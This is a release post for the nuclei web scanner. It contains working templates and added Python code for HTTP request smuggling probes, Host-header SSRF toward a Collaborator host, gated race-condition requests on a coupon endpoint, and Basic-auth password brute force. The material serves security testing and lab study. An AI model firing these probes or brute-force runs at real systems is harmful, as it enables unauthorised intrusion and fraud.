Nuclei - Fuzz all the things

The latest nuclei release is a big one, with many new features as well as bug fixes to the existing code base. Significant additions have been made to both the fuzzing and the templating capabilities of nuclei.

Non-RFC Compliant Requests


Earlier versions of nuclei used the base Go HTTP library. Requests were strictly validated, and non-spec-compliant requests were dropped. The new release adds an unsafe attribute backed by our rawhttp library, which allows sending any kind of malformed request to detect interesting behaviour and gives complete control over the bytes that go on the wire.

Some examples of the types of request you can send with nuclei unsafe requests are:

  • HTTP Smuggling Requests
  • CRLF Requests with Malformed Characters
  • Custom Host Header Requests
  • Invalid Request Formats, non-standard HTTP Methods, etc.

These examples only scratch the surface of what is possible with rawhttp: think complete control over the request.

HTTP Smuggling

HTTP Smuggling is a class of web attacks recently made popular by Portswigger's research into the topic. For an in-depth overview, please refer to that research.

In the open source space, detecting HTTP smuggling is difficult, particularly because the detection requests are malformed by nature. Nuclei is able to reliably detect HTTP Smuggling vulnerabilities using the rawhttp engine.

The most basic example of an HTTP Smuggling vulnerability is CL.TE smuggling, where the front end uses the Content-Length header and the back end uses Transfer-Encoding. An example template to detect a CL.TE HTTP Smuggling vulnerability is provided below using the unsafe: true attribute for rawhttp based requests.

```yaml
id: CL.TE-http-smuggling

info:
  name: HTTP request smuggling, basic CL.TE vulnerability
  author: pdteam
  severity: info
  lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

requests:
  - raw:
    # The same request is sent twice: Content-Length (6) covers exactly
    # "0\r\n\r\nG", so a chunked back end stops at the "0" chunk and keeps
    # the stray "G", which then prefixes the second request ("GPOST").
    - |
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G
    - |
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G

    unsafe: true
    matchers:
      - type: word
        words:
          - 'Unrecognized method GPOST'
```
More examples are available in nuclei-docs for smuggling templates.
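
To make the CL.TE mechanics concrete, here is an added Python example (not nuclei's code and not part of the original post) that builds the probe from the template above byte for byte, then runs it through a simulated Content-Length front end and a simulated chunked back end to show where the stray G ends up. The host name example.test and the plain-HTTP probe_live helper are assumptions for illustration; the lab itself is served over HTTPS.

```python
import socket
from typing import Optional, Tuple


def build_cl_te_probe(host: str) -> bytes:
    """Byte-exact copy of the raw request in the template.

    Content-Length is computed from the body so it always covers exactly
    "0\\r\\n\\r\\nG" (6 bytes): a Content-Length front end forwards all six
    bytes, a chunked back end stops after the "0" chunk and keeps "G".
    """
    body = b"0\r\n\r\nG"
    head = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    )
    return head.encode() + body


def _split_head(buf: bytes) -> Tuple[bytes, bytes]:
    """Return (request line + headers incl. the blank line, remainder)."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        raise ValueError("incomplete request head")
    return buf[: end + 4], buf[end + 4 :]


def _header(head: bytes, name: str) -> Optional[str]:
    want = name.lower().encode()
    for line in head.split(b"\r\n")[1:]:
        key, sep, value = line.partition(b":")
        if sep and key.strip().lower() == want:
            return value.strip().decode()
    return None


def consume_by_content_length(buf: bytes) -> Tuple[bytes, bytes]:
    """Front-end view: the body length comes from Content-Length."""
    head, rest = _split_head(buf)
    n = int(_header(head, "Content-Length") or 0)
    if len(rest) < n:
        raise ValueError("incomplete body")
    return head + rest[:n], rest[n:]


def consume_by_chunked(buf: bytes) -> Tuple[bytes, bytes]:
    """Back-end view: the body ends at the zero-length chunk, whatever
    Content-Length says."""
    head, rest = _split_head(buf)
    pos = 0
    while True:
        line_end = rest.find(b"\r\n", pos)
        if line_end < 0:
            raise ValueError("incomplete chunk header")
        size = int(rest[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            if rest[pos : pos + 2] != b"\r\n":
                raise ValueError("chunk trailers not supported")
            pos += 2
            break
        if len(rest) < pos + size + 2:
            raise ValueError("incomplete chunk data")
        pos += size + 2  # chunk data plus its CRLF
    return head + rest[:pos], rest[pos:]


def simulate_desync(first_request: bytes, second_request: bytes) -> str:
    """Run both requests through a CL front end feeding a TE back end over one
    connection; return the method the back end parses for the second request."""
    req1, rest = consume_by_content_length(first_request + second_request)
    req2, _ = consume_by_content_length(rest)
    _, leftover = consume_by_chunked(req1 + req2)  # back end stops early on req1
    head, _ = _split_head(leftover)               # leftover == b"G" + req2
    return head.split(b" ", 1)[0].decode()


def probe_live(host: str, port: int = 80, timeout: float = 10.0) -> bool:
    """Plain-HTTP version of what the template does: send the probe twice on one
    connection and look for the lab's marker in the second response. Front ends
    may route the two requests to different back-end connections, so a negative
    result is not proof of absence."""
    probe = build_cl_te_probe(host)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(probe)
        sock.recv(65536)
        sock.sendall(probe)
        return b"Unrecognized method GPOST" in sock.recv(65536)
```

The simulation is what makes the Content-Length value matter: change it to 7 and the front end would also forward the CRLF that follows G, changing what the back end is left holding. Against a vulnerable target the second request's method becomes GPOST; an ordinary follow-up GET becomes GGET in the same way.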

Other examples

Another example is Host header attacks, which can now be detected reliably with the new rawhttp addition. The template below detects a Host header based SSRF from the Portswigger labs: the request line carries an absolute URI for the lab while the Host header points at a Collaborator domain.

```yaml
id: host-header-ssrf

info:
  name: Flawed Request Parsing Host Header SSRF
  author: pdteam
  severity: info

requests:
  - raw:
    # Replace the two placeholders with your lab id and Collaborator id.
    - |
      GET https://your-lab-id.web-security-academy.net/ HTTP/1.1
      Host: your-collaborator-id.burpcollaborator.net
    unsafe: true
...
```

Race Condition

Race conditions are another class of bugs that is not easily automated with traditional tooling. Burp Suite's Turbo Intruder introduced a gate mechanism: every byte of every request except the last one is sent ahead of time, and the final byte of each request is then sent together for all requests, synchronising the moment at which the server sees them complete.

Below is an example template in which the same request is repeated 15 times using the gate logic.

```yaml
id: race-condition-testing

info:
  name: Race condition testing
  author: pdteam
  severity: info

requests:
  - raw:
      - |
        POST /coupons HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache, no-transform
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

        promo_code=20OFF

    # send the request 15 times, releasing the last byte of each simultaneously
    race: true
    race_count: 15

    matchers:
      - type: status
        part: header
        status:
          - 200
```

Testing for race conditions in web applications is now as simple as this template.
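
The gate is easy to reproduce outside Burp. The following added Python example (not nuclei's implementation, and not from the original post) sends the coupon request from the template over 15 connections, holding back the final byte of each until every connection is primed, exactly as described above. The target host target.test is an assumption, and the example adds a Connection: close header so each response can be read to EOF; the dry-run transport exists only so the gate ordering can be verified without a network.

```python
import socket
import threading
from typing import Callable, List


def build_coupon_request(host: str, promo_code: str) -> bytes:
    """The POST from the template, with Content-Length computed. Connection:
    close is this example's choice so recv_all() can read to EOF."""
    body = f"promo_code={promo_code}".encode()
    head = (
        "POST /coupons HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Pragma: no-cache\r\n"
        "Cache-Control: no-cache, no-transform\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode() + body


class SocketConn:
    """One TCP connection. TCP_NODELAY so the single held-back byte is not
    delayed by Nagle's algorithm when the gate opens."""

    def __init__(self, host: str, port: int, timeout: float = 10.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

    def send(self, data: bytes) -> None:
        self.sock.sendall(data)

    def recv_all(self) -> bytes:
        chunks = []
        while True:
            chunk = self.sock.recv(65536)
            if not chunk:
                return b"".join(chunks)
            chunks.append(chunk)

    def close(self) -> None:
        self.sock.close()


def gated_send(request: bytes, count: int, connect: Callable[[], object]) -> List[bytes]:
    """Turbo Intruder style gate: `count` connections each send every byte but
    the last, block on a barrier until all are primed, then release the last
    byte so all `count` requests complete at the server within microseconds."""
    head, last = request[:-1], request[-1:]
    barrier = threading.Barrier(count)
    responses: List[bytes] = [b""] * count

    def worker(i: int) -> None:
        conn = connect()
        try:
            conn.send(head)             # request is "almost complete" at the server
            barrier.wait(timeout=30)    # gate stays closed until all workers are here
            conn.send(last)             # gate opens
            responses[i] = conn.recv_all()
        finally:
            conn.close()

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(count)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return responses


def status_code(response: bytes) -> int:
    """Status code of an HTTP response, or 0 if it is empty or unparseable."""
    try:
        return int(response.split(b" ", 2)[1])
    except (IndexError, ValueError):
        return 0


def count_status(responses: List[bytes], code: int) -> int:
    """What the template's status matcher reports: how many attempts got `code`.
    More than one 200 for a single-use coupon is the race."""
    return sum(1 for r in responses if status_code(r) == code)


class RecordingConn:
    """Dry-run transport (no network) that logs whether each send() carried
    the head or the held-back last byte, so the gate ordering can be checked."""
    log: List[str] = []
    _lock = threading.Lock()

    def send(self, data: bytes) -> None:
        with RecordingConn._lock:
            RecordingConn.log.append("last" if len(data) == 1 else "head")

    def recv_all(self) -> bytes:
        return b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"

    def close(self) -> None:
        pass


def gate_dry_run(request: bytes, count: int) -> List[str]:
    """Global send order across all workers; with a working gate every 'head'
    precedes every 'last'."""
    RecordingConn.log = []
    gated_send(request, count, RecordingConn)
    return list(RecordingConn.log)


if __name__ == "__main__":
    req = build_coupon_request("target.test", "20OFF")
    # Live run: gated_send(req, 15, lambda: SocketConn("target.test", 80))
    print(gate_dry_run(req, 15))
```

Against a live target, count_status(responses, 200) greater than 1 for a single-use coupon is the finding; the barrier timeout exists so that one failed connection breaks the gate for all workers instead of hanging them.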

Advanced Fuzzing Support


We've enriched nuclei to allow advanced fuzzing of web servers. Users can now use multiple options to tune HTTP fuzzing workflows.

HTTP Pipelining

HTTP Pipelining support has been added, which allows multiple HTTP requests to be sent on the same connection without waiting for each response, inspired by Portswigger's research at https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn.

An example template demonstrating the pipelining capabilities of nuclei is provided below:

```yaml
id: pipeline-testing
info:
  name: pipeline testing
  author: pdteam
  severity: info

requests:

  - payloads:
      path: path_wordlist.txt

    attack: sniper
    unsafe: true
    pipeline: true
    pipeline-max-connections: 40
    pipeline-max-workers: 25000

    raw:
      - |
        GET /§path§ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Referer: {{BaseURL}}
        Connection: keep-alive

    matchers:
      - type: status
        part: header
        status:
          - 200
```

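
Added Python example (not from the original post and not nuclei's rawhttp) of what pipelining does on the wire: all GETs for a batch of paths go out in one write on a single keep-alive connection, and the responses are split back out in order by Content-Length. The host target.test, port 80 and the five-word list are assumptions; chunked responses are deliberately rejected rather than mis-parsed.

```python
import socket
from typing import Iterable, Iterator, List, Tuple


class IncompleteResponse(ValueError):
    """Raised when the stream does not yet hold all expected responses."""


def build_pipeline(host: str, paths: Iterable[str]) -> bytes:
    """Concatenate one GET per path (the template's raw request, minus the
    browser headers) so the whole batch goes out in a single write."""
    return "".join(
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Accept: application/json, text/plain, */*\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
        for path in paths
    ).encode()


def parse_responses(stream: bytes, expected: int) -> List[Tuple[int, bytes]]:
    """Split `expected` back-to-back HTTP/1.1 responses out of one byte stream.

    Servers must answer pipelined requests in order (RFC 7230 section 6.3.2),
    so the i-th response belongs to the i-th path. Bodies are delimited by
    Content-Length only; chunked responses raise ValueError rather than
    mis-split, and a short stream raises IncompleteResponse so the caller can
    read more."""
    out: List[Tuple[int, bytes]] = []
    pos = 0
    for _ in range(expected):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            raise IncompleteResponse("incomplete response head")
        lines = stream[pos:end].split(b"\r\n")
        status = int(lines[0].split(b" ")[1])
        length, chunked = 0, False
        for line in lines[1:]:
            key, _, value = line.partition(b":")
            key = key.strip().lower()
            if key == b"content-length":
                length = int(value.strip())
            elif key == b"transfer-encoding" and b"chunked" in value.lower():
                chunked = True
        if chunked:
            raise ValueError("chunked response bodies are not supported here")
        body_start = end + 4
        if len(stream) < body_start + length:
            raise IncompleteResponse("incomplete response body")
        out.append((status, stream[body_start : body_start + length]))
        pos = body_start + length
    return out


def pipeline(host: str, port: int, paths: List[str], timeout: float = 10.0) -> List[Tuple[int, bytes]]:
    """Send all `paths` on one connection in a single write and collect the
    responses, reading until the stream parses cleanly."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_pipeline(host, paths))
        while True:
            try:
                return parse_responses(buf, len(paths))
            except IncompleteResponse:
                chunk = sock.recv(65536)
                if not chunk:
                    raise ConnectionError("server closed the connection mid-pipeline")
                buf += chunk


def batches(items: Iterable[str], size: int) -> Iterator[List[str]]:
    """Group a wordlist into per-connection batches so one socket never
    carries more than `size` outstanding requests."""
    batch: List[str] = []
    for item in items:
        batch.append(item)
        if len(batch) == size:
            yield batch
            batch = []
    if batch:
        yield batch


if __name__ == "__main__":
    # Constructed wordlist; one connection per batch of 50 paths.
    wordlist = ["admin", "api", "backup", "config", "login"]
    for group in batches([f"/{w}" for w in wordlist], 50):
        for path, (status, _) in zip(group, pipeline("target.test", 80, group)):
            print(status, path)
```

Ordering is the whole trick: because HTTP/1.1 guarantees in-order responses on a connection, no per-request correlation is needed, which is why a single write followed by a single read loop can drive a wordlist far faster than one request per round trip. A server that closes the connection after the first response (or answers with chunked bodies) needs the fallback of one request per connection.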
HTTP Connection Pooling

While earlier versions of nuclei did not do connection pooling, templates can now be configured to use HTTP connection pooling or not, which allows faster scanning when the target supports it. An example template for this new capability:

```yaml
id: fuzzing-example
info:
  name: Connection pooling example
  author: pdteam
  severity: info

requests:
  - payloads:
      password: password.txt

    threads: 40
    attack: sniper

    # Deliberately no Connection: close header below; it would defeat pooling.
    raw:
      - |
        GET /protected HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64('admin:§password§')}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "Unique string"
        part: body
```

Note: do not add a 'Connection: close' header to a template that relies on connection pooling; it forces a new TCP connection for every request and defeats the pooling.

Simplified Workflow Syntax


We use tengo as the scripting engine for nuclei workflows, which provides a very powerful and highly customisable engine for users to automate their needs. However, creating workflows in tengo scripting syntax was something we always wanted to improve for a better user experience, aligning workflows with the simple YAML format already used by templates.

Workflows have been reworked to adopt a simpler YAML based syntax which makes creating complex workflows a breeze. Older workflows are still supported and will run as before.

An example workflow, in the new syntax, which runs exploit templates only if Spring Boot is detected is provided below.

```yaml
workflows:
  - template: security-misconfiguration/springboot-detect.yaml
    subtemplates:
      - template: cves/CVE-2018-1271.yaml
      - template: cves/CVE-2020-5410.yaml
```

Matcher names can also be checked, so that different subtemplates run depending on which matcher fired. Chained templates are also possible by nesting subtemplates under a template block.

```yaml
workflows:
  - template: technologies/tech-detect.yaml
    matchers:
      - name: lotus-domino
        subtemplates:
          - template: technologies/lotus-domino-version.yaml
            subtemplates:
              - template: cves/CVE-2005-2428.yaml
```

Burp Collaborator Support

We've also added support for Burp Collaborator based polling for out-of-band and blind security testing. This allows you to create templates that report interactions based on DNS or HTTP events received by the Collaborator server.

```yaml
id: collab-automation
info:
  name: Collab automation with nuclei
  author: pdteam
  severity: info

requests:
  - raw:
      # Content-Length is set by the HTTP client for non-unsafe raw requests.
      - |
        POST /api/v1/proxy HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36
        Content-Type: application/json

        {"url":"http://<collab-id>.burpcollaborator.net/"}

    matchers:
      - type: dsl
        dsl:
          # wait 6 seconds for polling, then match on any Collaborator interaction
          - "waitfor(6) && collab('')"
```

Example of running the template with Collaborator:

```sh
echo https://vul-target.com | nuclei -t collab-automation.yaml -burp-collaborator-biid xxxxxxx
```

By default nuclei polls every 5 seconds and keeps track of the last 150 Collaborator events. Provide it with a Burp Suite Collaborator BIID and you're good to go!

Miscellaneous


Project Support

We've added project file support, which caches the requests made to targets during a scan so that the stored requests can be reused later for re-verification.

When the project flag is used, the requests of the current scan are stored in a temporary cache on disk. Later templates that make requests to the same paths are served from this cache. With the project-path flag, the cache can also be stored in a custom directory.

Basic stats support

We've replaced the progress bar with a simpler stats line that is printed every 5 seconds. This was done because the progress bar implementation was causing issues on several platforms.

What’s Next?

In the next release, network protocol requests (raw TCP, UDP, etc.) and local directory / file inputs will be supported.

The complete change-log of this release is available here.

Future of the project

In future, we’ll be adding the following new features to the project. Follow us to keep in touch with the progress.

  • A new documentation site for easy access to templating guide and docs.
  • Notification module to send alerts on identified bugs.
  • UI / Web Form to create a template with just a few clicks.
  • Test Server to validate nuclei templates at runtime.

Questions / Feedback

If you're already a user of nuclei and would like to suggest a feature or share some ideas, feel free to reach out. You can contact us on Twitter (@pdnuclei, @pdiscoveryio) or by email at contact@projectdiscovery.io. We'd love to hear from you.

You can follow the Nuclei and Nuclei templates projects on GitHub. Contributions of new templates as well as ideas are very welcome!